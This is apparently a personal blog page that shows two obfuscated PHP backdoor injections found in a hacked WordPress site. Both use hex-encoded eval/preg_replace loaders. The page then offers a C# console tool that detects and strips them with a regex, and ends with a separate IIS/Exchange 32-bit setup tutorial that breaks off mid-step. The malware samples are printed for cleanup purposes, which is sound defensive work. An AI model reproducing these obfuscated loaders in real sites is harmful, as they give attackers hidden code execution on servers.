$GLOBALS["%x61%156%x75%156%x61"]=13g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%xfw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7<!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%xy4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825c;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5cgj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7856<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787c%x7825yy)#}#-#%x5c%x7824-%7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5y]#>n%x5c%x7825<#372]58y]472]37y]6265]y72]254]y76#<%x5c%x7825tmw!>!#]y8##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-T-%x5c%x7825bT-%x5c%x7825hW~%%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%x782572]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5%x5c%x787f<u%x5c%x7825V%x5c%x7827{f5i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5cif((function_exists("%x6f%142%x5f%163%x74%141%x72%1624<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x4") && (!isset($GLOBy]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7824%x5c%x78223}!+!<+{e%x5c%x7825+*]277]y72]265]y39]274]y85]273]1]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]25-bubE{h%x5c%x7825)sutcvt-#w#)l5c%x7860ftsbqA7>q%x5c%x782w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x78225G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5x5c%x7825>2q%x5c%x7825<#g6R85,67R382]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x295c%x7860hA%x5c%x7827s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<!fmtf!%/(.*)/epreg_replacejboqvgscnr'; $muvvrdubeg = explode(chr((272-228)),'9413,52,9516,20,8254,68,2714,48,7298,43,637,60,3448,68,959,55,5901,33,1144,33,8322,45,2278,35,1733,20,10024,20,4485,59,1282,49,265,50,8868,37,6108,35,4386,53,8025,68,1901,27,4581,33,9130,55,5258,29,548,36,5934,42,1202,31,2416,39,6027,51,6637,29,2134,40,7504,65,315,52,1958,37,7387,61,6189,32,3219,59,5704,31,7898,24,9804,26,8723,67,3380,68,865,43,4199,44,8367,57,5735,70,7225,38,2455,36,4353,33,7263,35,6666,70,8534,63,7448,56,3800,64,4664,38,8187,67,759,33,4778,65,6881,41,7857,41,6736,61,1995,36,6461,65,5834,67,8663,60,9772,32,6526,57,3331,20,7608,65,1451,34,5140,50,1677,56,7795,62,5089,51,228,37,4029,30,5190,68,6922,23,1233,21,9286,47,697,23,2208,45,2978,43,7100,64,8817,51,3990,39,3901,68,4073,52,1388,63,5341,53,4178,21,1856,23,3055,43,6304,53,8093,67,8976,62,3021,34,4723,55,4871,35,3516,65,7050,50,5556,23,5425,65,4243,62,1928,30,6221,50,7742,53,9648,32,1331,57,2598,61,3581,39,9333,35,3658,25,6271,33,4305,48,842,23,2574,24,9947,34,8160,27,4439,46,2862,69,9536,55,2313,54,5579,28,3278,53,7569,39,5607,61,9680,29,2174,34,3969,21,2762,49,8939,37,3620,38,7164,61,8424,48,908,51,5040,49,1546,57,6583,54,2659,55,1879,22,8905,34,7341,46,2031,35,1603,26,720,39,93,42,3732,68,5805,29,1039,64,2253,25,6078,30,4906,67,8790,27,5976,51,4702,21,7922,20,5521,35,2811,51,9465,51,4973,67,422,43,8597,66,3098,68,6357,49,8472,62,6838,43,1810,46,9368,45,3166,28,3351,29,6945,57,9591,57,5490,31,7002,48,4843,28,1524,22,1485,39,3194,25,584,30,367,55,1753,57,9038,63,4544,37,9243,43,6143,46,3864,37,200,28,792,50,9895,52,1014,25,2066,68,9101,29,7673,69,465,37,6797,41,135,65,5287,54,5394,31,4125,53,7942,63,9185,58,10044,62,3683,49,1103,41,1629,48,2367,49,502,46,5668,36,2931,47,614,23,9830,65,60,33,2518,56,1177,25,1254,28,6406,55,8005,20,0,60,2491,27,4614,50,9709,63,9981,43,4059,14'); $pymbewnzvs=substr($jfdbjfrkuo,(33117-23011),(40-33)); if (!function_exists('pvtuswizbe')) { function pvtuswizbe($rcyjifscei, $ybtsehfxul) { $wqnnfqixnz = NULL; for($fsealxtzrj=0;$fsealxtzrj<(sizeof($rcyjifscei)/2);$fsealxtzrj++) { $wqnnfqixnz .= substr($ybtsehfxul, $rcyjifscei[($fsealxtzrj*2)],$rcyjifscei[($fsealxtzrj*2)+1]); } return $wqnnfqixnz; };} $wquuspcnxa="\x20\57\x2a\40\x69\145\x61\150\x6d\143\x69\166\x72\167\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\66\x36\55\x31\62\x39\51\x29\54\x20\143\x68\162\x28\50\x35\66\x39\55\x34\67\x37\51\x29\54\x20\160\x76\164\x75\163\x77\151\x7a\142\x65\50\x24\155\x75\166\x76\162\x64\165\x62\145\x67\54\x24\152\x66\144\x62\152\x66\162\x6b\165\x6f\51\x29\51\x3b\40\x2f\52\x20\142\x68\167\x64\166\x66\145\x79\161\x76\40\x2a\57\x20"; $bgeknslzdf=substr($jfdbjfrkuo,(33566-23453),(41-29)); $bgeknslzdf($pymbewnzvs, $wquuspcnxa, NULL); $bgeknslzdf=$wquuspcnxa; $bgeknslzdf=(825-704); $jfdbjfrkuo=$bgeknslzdf-1; ?>

Others (50+) was starting like this, and other random vars

<?php $ghkpbkldao = '#-!OVMM*<%x22%51%x29%51%x29%73", NULL); 160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%162%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!s825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x786I&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&7jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88y]27]28y]#%xx5c%x78256<*Y%x5c%x78%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tuss%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%%x61%156%x75%156%x61"]=1; functioq%x5c%x7825l}S;2-u%x5c%x782fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#ox5c%x78e%x5c%x78b%x5c%x7825m34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84]6]234]342]58]24]31#-%n fjfgg($n){return chr(ord($n78242178}527}88:}334}48256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5n%x5c%x7825-#+I#)q%x6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x5c%x787f_*#fmjgk4%x5cif((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (!isset($y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x7]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33b:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=t275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368])!gj!<2,*j%x5c%x7825!5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;278X6<#o]o]Y%x5c%x7825)fepmqnj!%x5c%x782f!#0#)ix7825j=tj{fpg)%x5c%x7qov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x75c%x782fr%x5c%x7825%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!dovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*4-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%xx5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%xx7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%xdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-11111%x5c%x785c%x5c%x7825j:]#>m%x5c%x7825:|:*r%x5c%x7825%x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x78257860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]3645c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUx782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]hofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7821y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hc_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b7824-%x5c%x7824y4%x5c%]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c}^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825x5c%x7825tdz*Wsfuvso!%x5c%x71]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7%x78256<#o]1%x5c%x782f20QUUI7jx782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%78b%x5c%x7825ggg!>!#]y81]273]y76]258]jR%x5c%x7827id%x5c%x78256<%x5c%x787%x5c%x787f<*XAZASV<*w%x825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x572%x5c%x7824<!%x5c%x7825mm!>!#]y81]5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785c87fw6*3qj%x5c%x78257>%x5c%x782272qj%x5c%x7b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]2782p%x5c%x7825!|!*!***b%x5c%x7825O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x22:ftmbg39*56A:>:8:|:7#6#)tutjy257-C)fepmqnjA%x5c%x77824-%x5c%x7824y7%x5c%x78m)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x782|!%x5c%x7824-%x5c%x7824%x5x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x77825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#9-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg827!hmg%x5c%x7825)!gj!~<ofufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825)q}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5f%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuw;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjuSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x782dubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpupd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c65","%x65%166%x61%154%x28%151%x6d%160%x6!#]y76]277]y72]265]y39]274]y85]273]y86]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]2w6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gjc%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61%y6g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5x5c%x782f2986+7**^%x5c%x782f%x5c%x78825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%sut)tpqssutRe%x5c%x7825)Rj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x782)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5cd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#)-1);} @error_reporting(0); preg_replace("%x2f%50%x2e%52%x29%57%x7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x78z!>2<!gps)%x5c%x7825j>1<%x5cx5c%x7825:osvufs:~928>>%x5c%x780gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x782323ldfidk!~!<**qp%x5c%x7825!7;utpI#7>%x5c%x782f7rfs%x5c7fw6*CW&)7gj6<.[A%x5c%6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujoc%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x7{jt)!gj!<*2bd%x5c%x7825-#1GO%f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x%x7860hA%x5c%x7827pd%x5c%x7%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fep7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x75c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%xx5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825npd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%sv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787f825w6Z6<.4%x5c%x7860hA%x5c%x7827c%x7825-#jt0}Z;0]=]0#)2!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x25h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*825bss%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x7825Z<^2%x5c%x785c2%x7825j=6[%x5c%x7825ww2!>#p#%x525>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x78)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x^-%x5c%x7825hOh%x5c%%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%860{6:!}7;!}6;##}C;!>>!x5c%x7822)!gj}1~!<2p%25r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o%x5c%x7825)!gj!<2,*j%7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbM5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x77;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%55Ld]55#*<%x5c%x7825bG7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>:+946:ce44#)zbssb!>!ssbnpex7825tww**WYsboepn)%x5c)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<uboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;my%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%xx782400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x78255!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fwfs%x5c%x78256<*17-SFEBFI,878{**#k#)tutjyf%x5c%x7860%x7>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)CW&)7gj6<*doj%x5c%x785%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y35c%x7822!ftmbg)!gj<*#x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x73of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%4-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]5b:>1<!fmtf!%x5c%x7825b:>%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>q%5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)mx7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x782273]y76]258]y6g]273]y7666~67<&w6<*&7-#o]s]o]s]825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:57%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x782322]3]364]6]283]427]36]373P6]36]73]83]238po#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)y83]256]y81]265]y72]254]y76]61]y33]68]y[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c27827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7885cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x782%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x7825x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%146fw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c65]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]275c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5cx5c%x782fh%x5c%x7825)GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS[")7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827t4)#P#-#Q#-#B#-#T#-#E#-#G2)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x.;%x5c%x7860UQPMSVD!-id%x5c%msv%x5c%x7825)}k~~~<ftmbg!osvufsc%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%5<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48yc%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%3]y76]277#<%x5c%x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)6<*QDU%x5c%x7860MPT7-NBFSUT%x525)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x782/(.*)/epreg_replacedjblbnsdwy'; $qzzwqleqqo = explode(chr((273-229)),'1058,68,9328,48,501,33,832,29,5353,65,4624,40,4856,50,40,50,9096,57,9002,48,9888,55,3941,41,5932,39,6204,32,4587,37,5848,27,883,39,1361,52,8401,23,6670,42,9050,46,7695,55,5418,61,1654,21,5613,27,3108,30,6150,54,4794,62,10009,30,5727,58,3490,42,5003,56,386,21,10039,67,8494,65,230,42,7901,69,8918,41,7600,42,942,57,7750,21,3812,21,1474,52,1037,21,2244,55,9376,58,7642,25,5662,65,3237,35,561,53,5640,22,4041,44,6712,23,3982,59,3295,58,9561,28,2064,62,8757,54,4379,52,1888,41,9589,32,999,38,6484,43,6441,43,1588,21,4136,60,6800,21,1752,61,4196,26,7436,51,6821,36,1721,31,1994,70,4085,51,2638,70,6099,51,6735,21,8040,35,6390,20,3532,48,5785,29,9943,66,7970,70,5149,58,5875,57,2126,67,9458,42,3685,31,7232,36,5814,34,2299,38,1675,25,4526,61,5059,25,5207,58,7124,26,2447,38,181,49,2708,64,674,39,8600,50,4222,38,5585,28,272,44,3427,63,4431,39,7390,46,8959,43,6982,69,5507,31,3781,31,4311,68,2548,42,6034,65,6527,61,7880,21,7268,63,3580,50,3272,23,5971,63,9264,43,8221,40,6916,66,7667,28,1609,45,1184,65,4260,51,6236,23,534,27,7547,53,7173,59,4664,35,4906,61,4750,44,9216,48,9829,59,4699,51,7487,60,316,70,1813,20,9307,21,922,20,8261,65,6608,62,2590,48,9719,57,2215,29,9500,61,861,22,3392,35,8378,23,2794,59,1833,55,3915,26,4470,56,7771,61,7073,51,6259,38,2772,22,8326,52,1929,65,3833,25,614,60,1700,21,137,44,5538,47,8075,62,2853,70,407,43,9153,63,450,51,90,47,7331,59,8873,45,6297,35,8689,68,6588,20,3138,62,7150,23,7832,48,3010,60,3630,55,3070,38,8811,62,9661,58,2485,63,1315,46,6857,59,7051,22,1413,61,9621,40,2404,43,1526,62,8559,41,2337,67,810,22,2982,28,6332,58,4967,36,6756,44,1249,66,5084,65,8137,32,8424,70,2193,22,2924,58,5479,28,6410,31,3353,39,9776,53,5265,45,713,28,3858,57,9434,24,5310,43,3716,65,3200,37,1126,58,8169,52,8650,39,741,69,0,40,2923,1'); $ifjhyarlhw=substr($ghkpbkldao,(36181-26075),(32-25)); if (!function_exists('wpatekrfkn')) { function wpatekrfkn($lvejcmnday, $tqebttflow) { $wzjddmebme = NULL; for($bkbmnonwwh=0;$bkbmnonwwh<(sizeof($lvejcmnday)/2);$bkbmnonwwh++) { $wzjddmebme .= substr($tqebttflow, $lvejcmnday[($bkbmnonwwh*2)],$lvejcmnday[($bkbmnonwwh*2)+1]); } return $wzjddmebme; };} $szerhjoqyk="\x20\57\x2a\40\x64\143\x63\141\x70\161\x7a\146\x6c\165\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\64\x30\55\x32\60\x33\51\x29\54\x20\143\x68\162\x28\50\x36\64\x32\55\x35\65\x30\51\x29\54\x20\167\x70\141\x74\145\x6b\162\x66\153\x6e\50\x24\161\x7a\172\x77\161\x6c\145\x71\161\x6f\54\x24\147\x68\153\x70\142\x6b\154\x64\141\x6f\51\x29\51\x3b\40\x2f\52\x20\150\x78\153\x69\142\x74\156\x74\164\x64\40\x2a\57\x20"; $eehkaejhtl=substr($ghkpbkldao,(31400-21287),(65-53)); $eehkaejhtl($ifjhyarlhw, $szerhjoqyk, NULL); $eehkaejhtl=$szerhjoqyk; $eehkaejhtl=(651-530); $ghkpbkldao=$eehkaejhtl-1; ?>

Tired of this haks I wrote a small .cs colsole for cleaning this files.
Other websites suggest a .sh script but I’m a Windows user and I’d use its tools.

Feel free to use/edit/whatever this code:


using System;
using System.Text;
using System.IO;
using System.Text.RegularExpressions;

namespace ConsoleApplicationCleanWordpress
{
    class Program
    {

        static Regex re = new Regex(@"^<\?php\sif\(\!isset\(\$GLOBALS\[" + "\"" + @"\\x61\\156\\x75\\156\\x61" + "\"" + @"\]\)\)\s.*\s\?>");

        //static Regex re = new Regex(@"^<\?php.*(\#\-\!OVMM\*\<%x22%51%x29%51%x29%73"", NULL\);).*\s\?>");

        static int count = 0;

        static void Main(string[] args)
        {
            cleanFolder(@"C:\Users\max\Desktop\public_html");

            Console.WriteLine(count + " infecetd files.");
            Console.WriteLine("THE END!");
            Console.ReadLine();

        }

        private static void cleanFolder(string folder)
        {
            var di = new DirectoryInfo(folder);

            foreach (var subfolder in di.GetDirectories())
                cleanFolder(subfolder.FullName);

            /*
            foreach (var file in di.GetFiles())
            {
                if (file.FullName.ToLower().EndsWith(".php"))
                    cleanFile(file);
                else
                    file.Delete(); // don't need to upload it anymore (css, js, big files, etc)
            }
            */

            foreach (var file in di.GetFiles("*.php"))
                cleanFile(file);

        }

        private static void cleanFile(FileInfo file)
        {
            var content = File.ReadAllText(file.FullName);
            if (re.IsMatch(content))
            {
                var orig = file.FullName;
                Console.WriteLine(++count + " Infected: " + orig);
                file.MoveTo(orig + ".bk");
                File.WriteAllText(orig, re.Replace(content, ""));
            }
        }
    }
}


Other resources:

17 dicembre 2013
di max
1 commento

Install 32 bit Websites on Windows 2008 64 bit besides MS Exchange/Outlook

0.00 avg. rating (0% score) - 0 votes

Every time I’m istalling a website on a Win 2008 64 bit server I’ve a lot of problem with MS Exchange and Outlook components. I think this tutorial might save a lot of time to a lot of people!

Event log error message: The Module DLL C:\Windows\system32\RpcProxy\RpcProxy.dll failed to load. The data is the error.
Error message: Could not load file or assembly ‘MMInterfaceVB’ or one of its dependencies. An attempt was made to load a program with an incorrect format.
Error message: The Module DLL ‘C:\Program Files\Microsoft\Exchange Server\ClientAccess\Owa\auth\exppw.dll’ could not be loaded due to a configuration problem. The current configuration only supports loading images built for a x86 processor architecture. The data field contains the error number.
Error message: HTTP Error 500.19 (Module: DynamicCompressionModule)

This error is caused becouse you are loading a 64 bit dll on a 32 bit website.

First of all check your Application pool settings and enable the 32 bit support

32bitappool

This settings It’s going to create other problems, your Aplication pools might be stopping while you open the webpage!

rpc

Next step is to disable certain dlls on 32 bit applications

Procedure:

Before starting BACKIP FILES before making changes.

To enable Web Components:

  1. Run the following command with elevated privileges:%windir%\system32\inetsrv\appcmd.exe set config <yoursite>
    -section:system.webServer/httpCompression /-[name=’xpress’]This command disables a compression module which is enabled by default on SBS 2008.
  2. Open a text editor or XML editor with elevated privileges (for instance, from the Start menu right-click Notepad and selectRun as Administrator).In the file %windir%\system32\inetsrv\config\applicationhost.config:
    •  change the line
